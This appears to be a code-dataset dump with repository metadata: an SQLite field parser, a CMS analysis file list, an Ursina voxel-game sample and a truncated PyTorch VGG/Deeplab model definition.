from . import parsers, for_type, before_parse
@parsers.register_for(SQLite)
class SQLiteParser(ListsParser, TimeParser, JSONParser):
@before_parse('decimal')
def decimal_extras(self, field_type):
return {'decimals': field_type[8:-1].split(',')[-1]}
@for_type('decimal')
def _decimal(self, value, decimals):
value = ('%.' + decimals + 'f') % value
return Decimal(value)
| [
"giovanni.barillari@gmail.com"
] | giovanni.barillari@gmail.com |
3c42be0f8099c9e7b8595aa69bbb9c8e1050e189 | 56f5b2ea36a2258b8ca21e2a3af9a5c7a9df3c6e | /CMGTools/H2TauTau/prod/25aug_corrMC/up/mc/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0_1377467501/source_cfg.py | 87300ec1ff28def220494de84293ca0458b2af1f | [] | no_license | rmanzoni/HTT | 18e6b583f04c0a6ca10142d9da3dd4c850cddabc | a03b227073b2d4d8a2abe95367c014694588bf98 | refs/heads/master | 2016-09-06T05:55:52.602604 | 2014-02-20T16:35:34 | 2014-02-20T16:35:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,447 | py | ###SourceCFG: 98 GoodFiles; 0 BadFiles found in mask; Input prescale factor 1
files = ['/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_100_1_15n.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_101_1_83P.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_10_1_a2q.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_11_1_SXo.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_12_1_6B1.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_13_1_feX.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_14_1_EOd.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_15_1_M3y.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_16_1_o9V.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_17_1_eDW.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_18_1_yfs.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_19_1_pir.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_1_1_y4X.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_20_1_7Eb.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_21_1_VKf.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_22_1_cEp.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_23_1_bAp.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_24_1_oTC.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_25_1_Mg7.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_26_1_I2b.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_27_1_0E7.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_28_1_AvB.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_29_1_cZa.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_2_1_HBK.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_30_1_6wT.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_31_1_kis.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_32_1_x61.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_33_1_wgG.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_34_1_UDJ.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_35_1_o04.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_36_1_szk.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_37_1_qUo.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_38_1_UTW.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_39_1_UIH.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_40_1_JRe.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_41_1_ESu.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_42_1_asF.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_43_1_DIl.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_44_1_mI2.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_45_1_9cM.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_46_1_wuR.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_47_1_JO0.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_48_1_rZn.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_49_1_oSN.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_4_1_Vg8.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_50_1_q60.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_51_1_DkE.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_52_1_N5W.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_53_1_VrQ.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_54_1_02Y.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_55_1_NZ9.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_56_1_VVI.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_57_1_eWw.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_5_1_n6u.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_60_1_ABO.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_61_1_R0y.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_62_1_QAd.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_63_1_yQj.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_64_1_mYU.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_65_1_QR9.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_66_1_9mk.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_67_1_ze6.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_68_1_qrp.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_69_1_cK3.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_6_1_WRM.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_70_1_vSk.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_71_1_5eV.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_72_1_qab.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_73_1_q2C.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_74_1_Y8p.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_75_1_849.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_76_1_HyR.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_77_1_j8w.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_78_1_Ep3.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_79_1_3Iy.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_7_1_6q6.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_80_1_9bK.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_81_1_Xml.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_82_1_4f6.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_83_1_7Kh.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_84_1_w5d.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_85_1_3K6.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_86_1_hjZ.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_87_1_HvD.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_88_1_9Yo.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_89_1_IL8.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_8_1_SC6.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_90_1_lGk.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_91_1_XF8.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_92_1_AGd.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_93_1_xkH.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_94_1_syk.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_95_1_KmM.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_96_1_hJY.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_97_1_B9n.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_98_1_8bZ.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_99_1_N42.root', '/store/cmst3/group/cmgtools/CMG/SUSYGluGluToHToTauTau_M-1000_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_9_1_BCi.root']
| [
"riccardo.manzoni@cern.ch"
] | riccardo.manzoni@cern.ch |
e6c7be41238f437bec8d2fb51724a27d7b44d87d | 86834273400f125863bb0dd0e8ad22561c119ce1 | /samples/minecraft_clone.py | 18425e66eb4c3030ee769be4f2cf44a1315ac6fb | [
"MIT"
] | permissive | uditmaherwal/ursina | 9b50ae4ebf9008f086328eaeb7c79aadd3414174 | 20c6c396224f6a3b75a93a3142c0efde810fb480 | refs/heads/master | 2021-01-26T02:25:01.987909 | 2020-02-23T18:54:06 | 2020-02-23T18:54:06 | 243,273,206 | 1 | 0 | MIT | 2020-02-26T13:47:23 | 2020-02-26T13:47:22 | null | UTF-8 | Python | false | false | 834 | py | from ursina import *
from ursina.prefabs.first_person_controller import FirstPersonController
app = Ursina()
class Voxel(Button):
def __init__(self, position=(0,0,0)):
super().__init__(
parent = scene,
position = position,
model = 'cube',
origin_y = .5,
texture = 'white_cube',
color = color.color(0, 0, random.uniform(.9, 1.0)),
highlight_color = color.lime,
)
def input(self, key):
if self.hovered:
if key == 'left mouse down':
voxel = Voxel(position=self.position + mouse.normal)
if key == 'right mouse down':
destroy(self)
for z in range(8):
for x in range(8):
voxel = Voxel(position=(x,0,z))
player = FirstPersonController()
app.run()
| [
"pokepetter@gmail.com"
] | pokepetter@gmail.com |
0eeaba4db845cf41823269d51753df9e2692a96e | 2d3165b94a2e2da533ab0e2f2daef78a4a0c9e10 | /DCNNDemo/models-1804/VGG_Deeplab.py | ae049d49b2b757067a524396742f6445f4396ea9 | [] | no_license | shen1994/DepthAwareStereo | 51599a792077fc7673238d45f0fedabf744891af | d6c33069c80c05e6ad711682dd3b22df34fed8fe | refs/heads/main | 2023-01-08T19:11:28.881366 | 2020-10-30T02:24:29 | 2020-10-30T02:24:29 | 303,873,340 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,457 | py | import math
import torch
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
from model_utils import *
from ops.depthconv.modules import DepthConv
from ops.depthavgpooling.modules import Depthavgpooling
__all__ = [
'VGG', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn',
'vgg19_bn', 'vgg19',
]
model_urls = {
'vgg11': 'https://download.pytorch.org/models/vgg11-bbd30ac9.pth',
'vgg13': 'https://download.pytorch.org/models/vgg13-c768596a.pth',
'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth',
'vgg19': 'https://download.pytorch.org/models/vgg19-dcbb9e9d.pth',
'vgg11_bn': 'https://download.pytorch.org/models/vgg11_bn-6002323d.pth',
'vgg13_bn': 'https://download.pytorch.org/models/vgg13_bn-abd245e5.pth',
'vgg16_bn': 'https://download.pytorch.org/models/vgg16_bn-6c64b313.pth',
'vgg19_bn': 'https://download.pytorch.org/models/vgg19_bn-c79401a0.pth',
}
cfg = {
# name:c1_1 c1_2 c2_1 c2_2 c3_1 c3_2 c3_3 c4_1 c4_2 c4_3 c5_1 c5_2 c5_3
# dilation: 2 2 2
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
}
depth_cfg = {
'D': [0,3,6,10,14],
}
class ConvModule(nn.Module):
def __init__(self, inplanes, planes, kernel_size=3, stride=1, padding=1, dilation=1,
bn=False,
maxpool=False, pool_kernel=3, pool_stride=2, pool_pad=1):
super(ConvModule, self).__init__()
conv2d = nn.Conv2d(inplanes,planes,kernel_size=kernel_size,stride=stride,padding=padding,dilation=dilation)
layers = []
if bn:
layers += [nn.BatchNorm2d(planes), nn.ReLU(inplace=True)]
else:
layers += [nn.ReLU(inplace=True)]
if maxpool:
layers += [nn.MaxPool2d(kernel_size=pool_kernel, stride=pool_stride,padding=pool_pad)]
self.layers = nn.Sequential(*([conv2d]+layers))
del layers
def forward(self, x):
x = self.layers(x)
return x
class DepthConvModule(nn.Module):
def __init__(self, inplanes, planes, kernel_size=3, stride=1, padding=1, dilation=1,bn=False):
super(DepthConvModule, self).__init__()
conv2d = DepthConv(inplanes,planes,kernel_size=kernel_size,stride=stride,padding=padding,dilation=dilation)
layers = []
if bn:
layers += [nn.BatchNorm2d(planes), nn.ReLU(inplace=True)]
else:
layers += [nn.ReLU(inplace=True)]
self.layers = nn.Sequential(*([conv2d]+layers))#(*layers)
del layers
def forward(self, x, depth):
for im,module in enumerate(self.layers._modules.values()):
if im==0:
x = module(x,depth)
else:
x = module(x)
return x
class VGG_layer2(nn.Module):
def __init__(self, batch_norm=False, depthconv=False):
super(VGG_layer2, self).__init__()
self.depthconv = depthconv
self.conv1_1 = ConvModule(3, 64, bn=batch_norm)
self.conv1_2 = ConvModule(64, 64, bn=batch_norm, maxpool=True)
self.downsample_depth2_1 = nn.AvgPool2d(3,padding=1,stride=2)
self.conv2_1 = ConvModule(64, 128, bn=batch_norm)
self.conv2_2 = ConvModule(128, 128, bn=batch_norm, maxpool=True)
self.downsample_depth3_1 = nn.AvgPool2d(3,padding=1,stride=2)
self.conv3_1 = ConvModule(128, 256, bn=batch_norm)
self.conv3_2 = ConvModule(256, 256, bn=batch_norm)
